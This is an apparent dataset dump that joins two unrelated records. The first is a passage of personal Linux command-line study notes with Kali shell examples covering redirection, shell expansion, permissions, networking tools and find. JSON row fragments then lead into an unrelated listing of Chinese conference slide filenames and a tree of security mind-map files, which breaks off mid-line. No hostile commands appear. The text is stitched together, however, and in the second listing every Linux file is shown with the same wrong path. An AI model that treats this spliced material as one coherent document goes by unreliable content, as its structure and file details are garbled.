copy\nssh-copy-id (1) - use locally available keys to authorise logins on a remote ma...\nsvnversion (1) - Produce a compact version identifier for a working copy.\nvfs_shadow_copy (8) - Expose snapshots to Windows clients as shadow copies.\nvfs_shadow_copy2 (8) - Expose snapshots to Windows clients as shadow copies.\nx86_64-linux-gnu-objcopy (1) - copy and translate object files\n \n```\n\n---\n\n- `whatis` : Display One-line Manual Page Descriptions\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ whatis rm \nrm (1) - remove files or directories\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ whatis ls\nls (1) - list directory contents\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ whatis sudo\nsudo (8) - execute a command as another user\n \n```\n\n---\n\n- `info` : Display a Program’s Info Entry\n\n```\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ info ls\n\n```\n\n```\nNext: dir invocation, Up: Directory listing\n\n10.1 ‘ls’: List directory contents\n==================================\n\nThe ‘ls’ program lists information about files (of any type, including\ndirectories). Options and file arguments can be intermixed arbitrarily,\nas usual.\n\n For non-option command-line arguments that are directories, by\ndefault ‘ls’ lists the contents of directories, not recursively, and\nomitting files with names beginning with ‘.’. For other non-option\narguments, by default ‘ls’ lists just the file name. If no non-option\nargument is specified, ‘ls’ operates on the current directory, acting as\nif it had been invoked with a single argument of ‘.’.\n\n By default, the output is sorted alphabetically, according to the\nlocale settings in effect.(1) If standard output is a terminal, the\noutput is in columns (sorted vertically) and control characters are\noutput as question marks; otherwise, the output is listed one per line\nand control characters are output as-is.\n\n-----Info: (coreutils)ls invocation, 56 lines --Top------------------------------------\nFollow xref: gument is specified, ‘ls’ operates on the current directory, acting asif \n```\n\n---\n\n- `alias` : Creating Our Own Commands with alias\n - `trick: It’s possible to put more than one command on a line by separating each command with a semicolon`\n - `command1; command2; command3...`\n\n```\n[me@linuxbox ~]$ cd /usr; ls; cd -\nbin games include lib local sbin share src\n/home/me\n[me@linuxbox ~]$\n```\n```\n[me@linuxbox ~]$ type foo\nbash: type: foo: not found\n```\n```\n[me@linuxbox ~]$ alias foo='cd /usr; ls; cd -'\n[me@linuxbox ~]$ foo\nbin games include lib local sbin share src\n/home/me\n[me@linuxbox ~]$\n[me@linuxbox ~]$ type foo\nfoo is aliased to `cd /usr; ls; cd -'\n```\n```\n[me@linuxbox ~]$ unalias foo\n[me@linuxbox ~]$ type foo\nbash: type: foo: not found\n```\n\n---\n\n## 𝐑𝐞𝐝𝐢𝐫𝐞𝐜𝐭𝐢𝐨𝐧\n\n- ` > ` : Redirecting Standard Output\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ ls -l /usr/bin > ls-output.txt\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ ls -l \ntotal 180\ndrwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir1\ndrwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir2\ndrwxr-xr-x 2 shreyas shreyas 4096 Jan 4 17:21 dir3\n-rw-r--r-- 1 shreyas shreyas 171639 Jan 4 18:21 ls-output.txt\n \n```\n\n---\n\n- `command >> file` - append redirected output to a file instead of overwriting the file\n\n```\n[me@linuxbox ~]$ ls -l /usr/bin >> ls-output.txt\n```\n\n---\n\n- `0>` OR `<` : redirecting standard input\n- `>` : redirecting standard output\n- `2>` : redirecting standard error\n\n```\n[me@linuxbox ~]$ ls -l /bin/usr 2> ls-error.txt\n```\n\n---\n\n- `ls -l /bin/usr > ls-output.txt 2>&1` OR ` ls -l /bin/usr &> ls-output.txt`: Redirecting Standard Output and Standard Error to One File\n- `ls -l /bin/usr 2> /dev/null` : Disposing unwanted output\n\n---\n\n- `command1 | command2` : Pipeline\n- `wc` : Print line, Word, and Byte counts\n- `grep` : print line matching pattern\n- `head -n ls-output.txt` : print initial lines of file\n- `tail -n ls-output.txt` : print last lines of files \n- `tee` : Read from Stdin and Output to Stdout and Files\n- \n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ wc ls-output.txt \n 2557 24294 171639 ls-output.txt\n\n```\n```\n[me@linuxbox ~]$ head -n 5 ls-output.txt\ntotal 343496\n-rwxr-xr-x 1 root root 31316 2017-12-05 08:58 [\n-rwxr-xr-x 1 root root 8240 2017-12-09 13:39 411toppm\n-rwxr-xr-x 1 root root 111276 2017-11-26 14:27 a2p\n-rwxr-xr-x 1 root root 25368 2016-10-06 20:16 a52dec\n[me@linuxbox ~]$ tail -n 5 ls-output.txt\n-rwxr-xr-x 1 root root 5234 2017-06-27 10:56 znew\n-rwxr-xr-x 1 root root 691 2015-09-10 04:21 zonetab2pot.py\n-rw-r--r-- 1 root root 930 2017-11-01 12:23 zonetab2pot.pyc\n-rw-r--r-- 1 root root 930 2017-11-01 12:23 zonetab2pot.pyo\nlrwxrwxrwx 1 root root 6 2016-01-31 05:22 zsoelim -> soelim\n```\n\n---\n\n## 𝐒𝐞𝐞𝐢𝐧𝐠 𝐭𝐡𝐞 𝐰𝐨𝐫𝐥𝐝 𝐚𝐬 𝐭𝐡𝐞 𝐬𝐡𝐞𝐥𝐥 𝐬𝐞𝐞𝐬 𝐢𝐭\n\n- `echo` : Display a line of text\n - `echo *` : works same as `ls`\n - `echo D*` : Display files/directories which starts with D\n - `echo *s` : Display files/drectories which ends with s\n - `echo [[:upper:]]*` : Display files/directories that starts with uppercase letters \n - `echo /usr/*/share` : display all directories between /usr/ & /share\n - `echo ~` : tilde expansion\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ echo hello there my name is shreyas \nhello there my name is shreyas\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo * \nBugBounty Desktop Documents Downloads Music Pictures practise Public Templates Videos\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo D*\nDesktop Documents Downloads\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo *s\nDocuments Downloads Pictures Templates Videos\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo [[:upper:]]*\nBugBounty Desktop Documents Downloads Music Pictures Public Templates Videos\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo /usr/*/share\n/usr/local/share\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo ~ \n/home/shreyas\n\n \n```\n\n- Arithmetic Expansion:\n - `$((expression))` \n \n``` \n┌──(shreyas㉿kali)-[~]\n└─$ echo $((2 + 2))\n4\n\n┌──(shreyas㉿kali)-[~]\n└─$ echo $(($((5**2)) * 3))\n75\n \n```\n\nOperator | Description\n--- | ---\n`+` | Addition\n`-` | Subtraction\n`*` | Multiplication\n`/` | Division (but remember, since expansion supports only integer arithmetic, results are integers)\n`%` | Modulo, which simply means “remainder”\n`**` | Exponentiation\n\n- Brace Expansion: create multiple text strings from a pattern containing braces\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ echo Front-{A,B,C}-Back\nFront-A-Back Front-B-Back Front-C-Back\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo Number_{1..5}\nNumber_1 Number_2 Number_3 Number_4 Number_5\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo {01..15}\n01 02 03 04 05 06 07 08 09 10 11 12 13 14 15\n \n┌──(shreyas㉿kali)-[~]\n└─$ echo a{A{1,2},B{3,4}}b\naA1b aA2b aB3b aB4b\n \n```\n\n- Parameter expansion: `echo $var`\n- Command Substitution\n - `echo $(ls)`\n - `ls -l $(which cp)`\n - `file $(ls -d /usr/bin/* | grep zip)`\n \n---\n\n- Quoting:\n - Double Quotes: If we place text inside double quotes, all the special characters used by the shell lose their special meaning and are treated as ordinary characters. The exceptions are $ (dollar sign), \\ (backslash), and ` (backtick).\n - Single Quotes: If we need to suppress all expansions, we use single quotes.\n- Escaping Characters:\n - `\\` : is used for escaping\n- Backslash Escape Situation:\n\nEscape Sequence | Meaning\n--- | ---\n`\\a` | Bell (an alert that causes the computer to beep)\n`\\b` | Backspace\n`\\n` | Newline; on Unix-like systems, this produces a line feed\n`\\r` | Carriage return\n`\\t` | tab\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ sleep 10; echo -e \"Time's up\\a\"\nTime's up\n \n```\n---\n\n## 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐝 𝐊𝐞𝐲𝐛𝐨𝐚𝐫𝐝 𝐓𝐫𝐢𝐜𝐤𝐬\n\n- `clear` : Clear the terminal screen\n- `history` : Display or manipulate the history list\n\n- Cursor Movement:\n\nKey | Action\n--- | ---\n`CTRL-A` | Move the cursor to the beginning of line\n`CTRL-E` | Move cursor to the end of the line\n`CTRL-F` | Move cursor forward one character; same as the right arrow key\n`CTRL-B` | Move cursor backward one character; same as the left arrow key\n`ALT-F` | Move cursor one word forward\n`ALT-B` | Move cursor backward one word\n`CTRL-L` | Clear screen and move the cursor to the top left corner. Same as `clear` command\n\n---\n- Modifying Text\n\n\nKey | Action\n--- | ---\n`CTRL-D` | Delete the character at the cursor location\n`CTRL-T` | Transpose the character at the cursor location\n`ALT-T` | Transpose the word at the cursor location with the one preceding it.\n`ALT-L` | Convert the characters from the cursor location to the end of the word to lowercase.\n`ALT-U` | Convert the characters from the cursor location to the end of the word to uppercase.\n\n---\n\n- History Expansion\n\nSequence | Action\n--- | ---\n`!!` | Repeat the last command. It is probably easier to press the up arrow and ENTER\n`!number` | Repeat history list item `number`.\n`!string` | Repeat last history list item starting with `string`\n`!?string` | Repeat last history list item containing `string`\n\n\n---\n\n## 𝐏𝐞𝐫𝐦𝐢𝐬𝐬𝐢𝐨𝐧𝐬\n\n- `id` : Display user identity\n- `chmod` : Change a file’s mode\n- `umask` : Set the default file permissions\n- `su` : Run a shell as another user\n- `sudo` : Execute a command as another user\n- `chown`: Change a file’s owner\n- `chgrp`: Change a file’s group ownership\n- `passwd`: Change a user’s password\n\n- Permission attribute Examples:\n\nFile Attributes | Meaning\n--- | ---\n`-rwx------` | A regular file that is readable, writable, and executable by the file’s owner. No one else has any access.\n`-rw-------` | A regular file that is readable and writable by the file’s owner. No one else has any access.\n`-rw-r--r--` | A regular file that is readable and writable by the file’s owner. Members of the file’s owner group may read the file. The file is world-readable.\n`-rwxr-xr-x` | A regular file that is readable, writable, and executable by the file’s owner. The file may be read and executed by everybody else.\n`-rw-rw----` | A regular file that is readable and writable by the file’s owner and members of the file’s group owner only.\n`lrwxrwxrwx` | A symbolic link. All symbolic links have “dummy” permissions. The real permissions are kept with the actual file pointed to by the symbolic link.\n`drwxrwx---` | A directory. The owner and the members of the owner group may enter the directory and create, rename, and remove files within the directory.\n`drwxr-x---` | A directory. The owner may enter the directory and create, rename, and delete files within the directory. Members of the owner group may enter the directory but cannot create, delete, or rename files.\n\n---\n\n- `chmod` : Change File Mode\n - 6(rw-)\n - 7(rwx)\n - 5(r-x)\n - 4(r--)\n - 0(---)\n \nSymbol | Meaning\n--- | ---\n`u` | Short for \"user\" but means the file or directory owner.\n`g` | Group owner\n`o` | Short for \"others\" but means world\n`a` | Short for \"all\". This is a combination of `u`, `g`, and `o`.\n\n- If no character is specified, “all” will be assumed. The operation may be a + indicating that a permission is to be added, a - indicating that a permission is to be taken away, or a = indicating that only the specified permissions are to be applied and that all others are to be removed.\n\nNotation | Meaning\n--- | ---\n`u+x` | Add execute permission for the owner.\n`u-x` | Remove execute permission from the owner.\n`+x` | Add execute permission for the owner, group, and world. This is equivalent to a+x.\n`o-rw` | Remove the read and write permissions from anyone besides the owner and group owner.\n`go=rw` | Set the group owner and anyone besides the owner to have read and write permissions. If either the group owner or the world previously had execute permission, it is removed.\n`u+x,go=rx` | Add execute permission for the owner and set the permissions for the group and others to read and execute. Multiple specifications may be separated by commas.\n\n---\n\n## 𝐏𝐫𝐨𝐜𝐞𝐬𝐬𝐞𝐬\n\n- `ps` : Report a snapshot of current processes\n- `top` : Display tasks\n- `jobs` : List active jobs\n- `bg` : Place a job in the background\n- `fg` : Place a job in the foreground\n- `kill` : Send a signal to a process\n- `killall` : Kill process by name\n- `shutdown` : Shut down or reboot the system\n\n\n\n---\n\n## 𝐍𝐞𝐭𝐰𝐨𝐫𝐤𝐢𝐧𝐠\n\n- `ping` : Checks if a network is reachable, `ping` command sends a special network packet called an `ICMP ECHO_REQUEST` to a specified host. Most network devices receiving this packet will reply to it, allowing the network connection to be verified.\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ ping youtube.com \nPING youtube.com (142.250.204.46) 56(84) bytes of data.\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=1 ttl=128 time=149 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=2 ttl=128 time=151 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=3 ttl=128 time=188 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=4 ttl=128 time=140 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=5 ttl=128 time=139 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=6 ttl=128 time=120 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=7 ttl=128 time=131 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=8 ttl=128 time=148 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=9 ttl=128 time=137 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=10 ttl=128 time=132 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=11 ttl=128 time=144 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=12 ttl=128 time=128 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=13 ttl=128 time=128 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=14 ttl=128 time=141 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=15 ttl=128 time=135 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=16 ttl=128 time=130 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=17 ttl=128 time=133 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=18 ttl=128 time=142 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=19 ttl=128 time=134 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=20 ttl=128 time=137 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=21 ttl=128 time=139 ms\n^C64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=22 ttl=128 time=140 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=23 ttl=128 time=121 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=24 ttl=128 time=146 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=25 ttl=128 time=136 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=26 ttl=128 time=165 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=27 ttl=128 time=176 ms\n64 bytes from hkg07s38-in-f14.1e100.net (142.250.204.46): icmp_seq=28 ttl=128 time=132 ms\n^C\n--- youtube.com ping statistics ---\n28 packets transmitted, 28 received, 0% packet loss, time 27045ms\nrtt min/avg/max/mdev = 120.372/140.817/187.758/14.526 ms\n \n```\n\n---\n\n- `traceroute` : lists all the “hops” network traffic takes to get from the local system to a specified host.\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ traceroute google.com\ntraceroute to google.com (142.250.204.110), 30 hops max, 60 byte packets\n 1 192.168.29.2 (192.168.29.2) 0.227 ms 0.099 ms 0.175 ms\n 2 * * *\n 3 * * *\n 4 * * *\n 5 * * *\n 6 * * *\n 7 * * *\n 8 * * *\n 9 * * *\n10 * * *\n11 * * *\n12 * * *\n13 * * *\n\n```\n\n---\n\n- `ip a` : It replaces the earlier and now deprecated `ifconfig` program. \n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ ip a \n1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1/128 scope host \n valid_lft forever preferred_lft forever\n2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n link/ether 00:0c:29:c5:88:a0 brd ff:ff:ff:ff:ff:ff\n inet 192.168.x.x/24 brd 192.168.x.x scope global dynamic noprefixroute eth0\n valid_lft 1630sec preferred_lft 1630sec\n inet6 fe80::20c:29ff:x:x/64 scope link noprefixroute \n valid_lft forever preferred_lft forever\n\n```\n\n---\n\n- `netstat` : The netstat program is used to examine various network settings and statistics.\n - `-r` option will display the kernel’s network routing table\n - `ie` : we can examine the network interfaces in our system\n\n```\n┌──(shreyas㉿kali)-[~]\n└─$ netstat -ie \nKernel Interface table\neth0: flags=4163 mtu 1500\n inet 192.168.x.x netmask 255.255.255.0 broadcast 192.168.29.255\n inet6 fe80::20c:29ff:x:x prefixlen 64 scopeid 0x20\n ether 00:0c:29:c5:88:a0 txqueuelen 1000 (Ethernet)\n RX packets 102 bytes 11285 (11.0 KiB)\n RX errors 0 dropped 0 overruns 0 frame 0\n TX packets 207 bytes 17053 (16.6 KiB)\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\n\nlo: flags=73 mtu 65536\n inet 127.0.0.1 netmask 255.0.0.0\n inet6 ::1 prefixlen 128 scopeid 0x10\n loop txqueuelen 1000 (Local Loopback)\n RX packets 8 bytes 400 (400.0 B)\n RX errors 0 dropped 0 overruns 0 frame 0\n TX packets 8 bytes 400 (400.0 B)\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\n \n \n┌──(shreyas㉿kali)-[~]\n└─$ netstat -r \nKernel IP routing table\nDestination Gateway Genmask Flags MSS Window irtt Iface\ndefault 192.168.29.2 0.0.0.0 UG 0 0 0 eth0\n192.168.29.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0\n\n\n```\n\n---\n\nTransporting Files over a Network\n \n- `ftp` : `ftp` is used to communicate with FTP servers, machines that contain files that can be uploaded and downloaded over a network. `FTP` (in its original form) is not secure because it sends account names and passwords in cleartext.\n\n```\n[me@linuxbox ~]$ ftp fileserver\nConnected to fileserver.localdomain.\n220 (vsFTPd 2.0.1)\nName (fileserver:me): anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> cd pub/cd_images/ubuntu-18.04\n250 Directory successfully changed.\nftp> ls\n200 PORT command successful. Consider using PASV.\n150 Here comes the directory listing.\n-rw-rw-r-- 1 500 500 733079552 Apr 25 03:53 ubuntu-18.04-desktop-amd64.iso\n226 Directory send OK.\nftp> lcd Desktop\nLocal directory now /home/me/Desktop\nftp> get ubuntu-18.04-desktop-amd64.iso\nlocal: ubuntu-18.04-desktop-amd64.iso remote: ubuntu-18.04-desktop-amd64.iso\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for ubuntu-18.04-desktop-amd64.iso (733079552 bytes).\n226 File send OK.\n733079552 bytes received in 68.56 secs (10441.5 kB/s)\nftp> bye\n```\n\nCommand | Meaning\n--- | ---\n`ftp fileserver` | Invoke the `ftp` program and have it connect the FTP server `fileserver`\n`anonymous` | Login name. After the login prompt, a password prompt will appear. Some servers will accept a blank password; others will require a password in the form of an email address. In that case, try something like user@example.\n`cd` | change directory\n`ls` | list directory\n`lcd Desktop` | Change the directory on the local system to ~/Desktop. In the example, the ftp program was invoked when the working directory was ~. This command changes the working directory to ~/Desktop.\n`get` | transfer file from remote server to local system\n`bye` | Log off the remote server and end the ftp program session. The commands quit and exit may also be used.\n\n- `lftp` is a Better ftp\n\n---\n\n- `wget` : It is useful for downloading content from both web and FTP sites. Single files, multiple files, and even entire sites can be downloaded. \n\n```\n[me@linuxbox ~]$ wget http://linuxcommand.org/index.php\n--11:02:51-- http://linuxcommand.org/index.php\n => `index.php'\nResolving linuxcommand.org... 66.35.250.210\nConnecting to linuxcommand.org|66.35.250.210|:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: unspecified [text/html]\n\n [ <=> ] 3,120 --.--K/s\n\n11:02:51 (161.75 MB/s) - `index.php' saved [3120]\n```\n\n---\n\n- `ssh` : SSH solves the two basic problems of secure communication with a remote host.\n - It authenticates that the remote host is who it says it is (thus preventing so-called man-in-the-middle attacks).\n - It encrypts all of the communications between the local and remote hosts.\n - `ssh remote-sys` : To connect to a remote host named remote-sys\n - `ssh username@remote-sys` : login with specific username\n - `ssh remote-sys `: to execute just a single command\n\n\n\n```\n[me@linuxbox ~]$ ssh remote-sys\nThe authenticity of host 'remote-sys (192.168.1.4)' can't be established.\nRSA key fingerprint is 41:ed:7a:df:23:19:bf:3c:a5:17:bc:61:b3:7f:d9:bb.\nAre you sure you want to continue connecting (yes/no)?\n```\n\n---\n\n- `scp` - (secure copy). copy files from local host to remote host\n\n```\n[me@linuxbox ~]$ scp remote-sys:document.txt .\nme@remote-sys's password:\ndocument.txt 100% 5581 5.5KB/s 00:00\n[me@linuxbox ~]$\n```\n\n- `sftp` : SSH file-copying program\n\n```\n[me@linuxbox ~]$ sftp remote-sys\nConnecting to remote-sys...\nme@remote-sys's password:\nsftp> ls\nubuntu-8.04-desktop-i386.iso\nsftp> lcd Desktop\nsftp> get ubuntu-8.04-desktop-i386.iso\nFetching /home/me/ubuntu-8.04-desktop-i386.iso to ubuntu-8.04-desktop-i386.iso\n/home/me/ubuntu-8.04-desktop-i386.iso 100% 699MB 7.4MB/s 01:35\nsftp> bye\n```\n\n---\n\n\n## 𝐒𝐞𝐚𝐫𝐜𝐡𝐢𝐧𝐠 𝐟𝐨𝐫 𝐟𝐢𝐥𝐞𝐬\n\n- `locate` : Find files by name\n- `find` : Search for files in a directory hierarchy\n- `xargs ` : Build and execute command lines from standard input\n- `touch` : Change file times\n- `stat`: Display file or file system status\n\n---\n\n- `find` : find files the hard way\n - `find ~` : to produce a listing of our home directory\n - `find ~ | wc -l` : to count the number of files.\n - `find ~ -type d | wc -l` : `-type d` limit the search to directories\n - `find ~ -type f | wc -l` : `-type f` limit the search to regular files \n - `find ~ -type f -name \"*.JPG\" -size +1M | wc -l`: all the regular files that match the wildcard pattern *.JPG and are larger than one megabyte\n\nFile type | Description\n--- | ---\n`b` | Block special device file\n`c` | Character special device file\n`d` | Directory\n`f` | Regular file\n`l` | Symbolic link\n\n\n- find size units\n\nCharacter | Unit\n--- | ---\n`b` | 512-byte blocks. This is default if no unit is specified.\n`c` | Bytes\n`w` | 2-byte words\n`k` | Kilobytes (units of 1,024 bytes)\n`M` | Megabytes (units of 1,048,576 bytes)\n`c` | Gigabytes (units of 1,073,741,824 bytes)\n\n- More about `find` options: [Find cheatsheet](https://github.com/shreyaschavhan/linux-commands-cheatsheet/blob/main/find-cheatsheet.md)\n\n---\n\n- `xargs` - It accepts input from standard input and converts it into an argument list for a specified command\n\n```\nfind ~ -type f -name 'foo*' -print | xargs ls -l\n-rwxr-xr-x 1 me me 224 2007-10-29 18:44 /home/me/bin/foo\n-rw-r--r-- 1 me me 0 2016-09-19 12:53 /home/me/foo.txt\n```\n\n---\n\nRemaining:\n- archiving and backup\n- regular expressions\n- text processing\n- compiling programs\n- that's enough for now i guess\n\n"}}},{"rowIdx":558,"cells":{"text":{"kind":"string","value":"## 2019-3-files\n \n\t\t\t\t(可上传)张军-Paypal+AI+compute+platform+(002)-终稿.pdf\n\t\t\t\t2018-10+-+Reactive+Applications+with+Vert.x+-+QCon.pdf\n\t\t\t\t2018-10+-+Real-world+HTTP+performance+benchmarking+-+QCon.pdf\n\t\t\t\t【可以上传】19日上1_陈喆_Paypal的持续交付体系.pdf\n\t\t\t\t【可以上传】19日上3张甲磊-DevCloud+on+DevCloud每日10次发布效率提升实践(QCon上海2018).pdf\n\t\t\t\t【可以公开】10.19+下午第一场+欧阳坚-美团容器技术研发实践v1.2.pdf\n\t\t\t\t【可以公开】10.19+宴会厅2+下午第三场+王强-ApacheRocketMQ事务消息.pdf\n\t\t\t\t【可以公开】10.20+上午第一场+新型内容刘服务架构方式+范怀宇-终稿.pdf\n\t\t\t\t【可以公开】10.20+宴会2++下午第一场+钮博彦-研发度量-final.pdf\n\t\t\t\t【可以公开】10.20+宴会2+下午第二场+姚旭+从硅谷到中关村到底有多远.pdf\n\t\t\t\t【可以公开】10.20+宴会2+下午第四场+施翔+如何打造7X24H交付通道v2.0.pdf\n\t\t\t\t【可以公开】10.20宴会2++下午第三场+徐毅-五星级软件工程师的高效秘诀.pdf\n\t\t\t\t【可以公开】18下2-新型内容刘服务架构方式-邱岳【1.6】.pdf\n\t\t\t\t【可以公开】19日下1QCon上海2018-倪益杰-51信用卡6年上市我在技术团队的成长历程-公开版.pdf\n\t\t\t\t可上传终稿-粟海-浅谈Kafka+Streams在实时跟踪和监控系统中的应用.pdf\n\t\t\t\t最终版-沈礼-蚂蚁金服-蚂蚁亿级金融业务的前端实践.pdf\n\t\t\t\t(可发布)图数据库应用案例解析-常新宇.pdf\n\t\n\t\t\t\tlinux Web服务安全.xmind\t2019/3/files/linux/linux Web服务安全.xmind\t14 months ago\n\t\t\t\tlinux 环境部署.xmind\t2019/3/files/linux/linux Web服务安全.xmind\t14 months ago\n\t\t\t\tlinux常用命令.docx\t2019/3/files/linux/linux Web服务安全.xmind\t14 months ago\n\t\t\t\tlinux常用命令.mmap\t2019/3/files/linux/linux Web服务安全.xmind\t14 months ago\n\t\t\t\tlinux常用命令.xmind\t2019/3/files/linux/linux Web服务安全.xmind\t14 months ago\t \n\n\n\t\t\t\t目前包含如下的一些图片:\n\t\t\t\t```\n\t\t\t\t.\n\t\t\t\t├── CTF资料\n\t\t\t\t│   ├── CTF攻防部署.png\n\t\t\t\t│   └── CTF题目工具资源.png\n\t\t\t\t├── source\n\t\t\t\t│   ├── ADO.Net汇总~最新版.xmind\n\t\t\t\t│   ├── CSS.mmap\n\t\t\t\t│   ├── HTML笔记.mmap\n\t\t\t\t│   ├── JavaScriptBase.mmap\n\t\t\t\t│   ├── JavaWeb应用安全.xmind\n\t\t\t\t│   ├── JQurery自学笔记.mmap\n\t\t\t\t│   ├── SQL常用汇总.xmind\n\t\t\t\t│   ├── SQL汇总.xmind\n\t\t\t\t│   ├── 安全技能树.mm\n\t\t\t\t│   └── 安全技能树.xmind\n\t\t\t\t├── Web安全\n\t\t\t\t│   ├── 02.信息安全-工作范围.png\n\t\t\t\t│   ├── 03.信息安全-解决方案.png\n\t\t\t\t│   ├── 2012sec_event.jpg\n\t\t\t\t│   ├── DDoS攻击及对策.jpg\n\t\t\t\t│   ├── JavaWeb应用安全.png\n\t\t\t\t│   ├── JavaWeb简介.png\n\t\t\t\t│   ├── Jboss引起的内网渗透.png\n\t\t\t\t│   ├── Maltego使用导图.jpg\n\t\t\t\t│   ├── Meterpreter Cheat Sheet.pdf\n\t\t\t\t│   ├── P2P-security.png\n\t\t\t\t│   ├── pentester.jpg\n\t\t\t\t│   ├── pentest_method.jpg\n\t\t\t\t│   ├── PHP代码审计脑图.png\n\t\t\t\t│   ├── PHP源码审计.png\n\t\t\t\t│   ├── powershell语法.png\n\t\t\t\t│   ├── PTES_MindMap_CN1.pdf\n\t\t\t\t│   ├── Python代码审计脑图.jpg\n\t\t\t\t│   ├── Python系统审计.jpg\n\t\t\t\t│   ├── SEO-Cheatsheet.png\n\t\t\t\t│   ├── SEO导图.gif\n\t\t\t\t│   ├── SSRF漏洞挖掘脑图.jpg\n\t\t\t\t│   ├── t00ls_入侵感知图.png\n\t\t\t\t│   ├── WEB2HACK.jpg\n\t\t\t\t│   ├── web-内网基本流程小结.jpg\n\t\t\t\t│   ├── Web安全.jpg\n\t\t\t\t│   ├── Web安全.png\n\t\t\t\t│   ├── Web安全技术点.jpg\n\t\t\t\t│   ├── Web常见漏洞脑图.png\n\t\t\t\t│   ├── Web应用安全(By Neeao).jpg\n\t\t\t\t│   ├── web应用测试.jpg\n\t\t\t\t│   ├── Web指纹分析方法.png\n\t\t\t\t│   ├── Web攻击及防御技术.png\n\t\t\t\t│   ├── Web服务器入侵防御.jpg\n\t\t\t\t│   ├── Web架构中的安全问题.png\n\t\t\t\t│   ├── web渗透.jpg\n\t\t\t\t│   ├── WIKI渗透测试流程图.png\n\t\t\t\t│   ├── Windows_Hacker学习路线图.jpg\n\t\t\t\t│   ├── XML安全汇总.png\n\t\t\t\t│   ├── XSS2.png\n\t\t\t\t│   ├── xss virus 1.0 (余弦).png\n\t\t\t\t│   ├── XSS利用架构图.jpg\n\t\t\t\t│   ├── XSS攻击点汇总.png\n\t\t\t\t│   ├── XSS脑图.png\n\t\t\t\t│   ├── 中国黑阔技术金字塔.png\n\t\t\t\t│   ├── 主流测试工具分类.jpg\n\t\t\t\t│   ├── 习科技能表.jpg\n\t\t\t\t│   ├── 企业安全\n\t\t\t\t│   │   ├── desktop.ini\n\t\t\t\t│   │   ├── 互联网企业安全建设.png\n\t\t\t\t│   │   ├── 企业内网准入控制规划.jpg\n\t\t\t\t│   │   ├── 企业安全工作要点v0.2.jpeg\n\t\t\t\t│   │   └── 企业安全防御思维导图.png\n\t\t\t\t│   ├── 信息安全.jpg\n\t\t\t\t│   ├── 信息安全分层逻辑模型.jpg\n\t\t\t\t│   ├── 信息系统整体安全生命周期设计.jpg\n\t\t\t\t│   ├── 